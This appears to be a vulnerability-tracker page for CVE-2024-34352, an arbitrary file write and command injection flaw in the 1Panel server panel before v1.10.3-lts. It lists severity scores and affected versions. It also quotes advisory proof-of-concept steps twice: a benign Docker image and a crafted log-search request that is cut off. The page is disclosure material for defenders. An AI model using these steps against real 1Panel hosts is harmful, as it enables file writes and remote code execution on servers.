CVE-2024-34352
published 2024-05-14CVE-2024-34352: 1Panel is an open source Linux server operation and maintenance management panel. Prior to v1.10.3-lts, there are many command injections in the project, and…
PriorityP347high7.5CVSS 3.1
AVNACLPRNUINSUCNIHAN
EPSS
1.33%
67.5th percentile
1Panel is an open source Linux server operation and maintenance management panel. Prior to v1.10.3-lts, there are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. The mirror configuration write symbol `>` can be used to achieve arbitrary file writing. This vulnerability is fixed in v1.10.3-lts.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 1panel-dev | 1panel | <= v1.10.2-lts | — |
| fit2cloud | 1panel | < 1.10.3-lts | 1.10.3-lts |
| github.com | 1panel-dev_1panel | >= 0 < 1.10.3-lts | 1.10.3-lts |
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Arbitrary file write in github.com/1Panel-dev/1Panel
osv·2024-05-14
CVE-2024-34352 Arbitrary file write in github.com/1Panel-dev/1Panel
Arbitrary file write in github.com/1Panel-dev/1Panel
A maliciously crafted packet can write to an arbitrary file.
OSV
1Panel arbitrary file write vulnerability
osv·2024-05-09
CVE-2024-34352 [MEDIUM] 1Panel arbitrary file write vulnerability
1Panel arbitrary file write vulnerability
### Summary
There are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs.
We can use the following mirror configuration write symbol `>` to achieve arbitrary file writing
### PoC
Dockerfile
```
FROM bash:latest
COPY echo.sh /usr/local/bin/echo.sh
RUN chmod +x /usr/local/bin/echo.sh
CMD ["echo.sh"]
```
echo.sh
```
#!/usr/local/bin/bash
echo "Hello, World!"
```
Build this image like this, upload it to dockerhub, and then 1panel pulls the image to build the container
Send the following packet, taking care to change the containerID to the malicious container we constructed
```
GET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e8
GHSA
1Panel arbitrary file write vulnerability
ghsa·2024-05-09
CVE-2024-34352 [MEDIUM] CWE-77 1Panel arbitrary file write vulnerability
1Panel arbitrary file write vulnerability
### Summary
There are many command injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs.
We can use the following mirror configuration write symbol `>` to achieve arbitrary file writing
### PoC
Dockerfile
```
FROM bash:latest
COPY echo.sh /usr/local/bin/echo.sh
RUN chmod +x /usr/local/bin/echo.sh
CMD ["echo.sh"]
```
echo.sh
```
#!/usr/local/bin/bash
echo "Hello, World!"
```
Build this image like this, upload it to dockerhub, and then 1panel pulls the image to build the container
Send the following packet, taking care to change the containerID to the malicious container we constructed
```
GET /api/v1/containers/search/log?container=6e6308cb8e4734856189b65b3ce2d13a69e8
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
2024-05-14
Published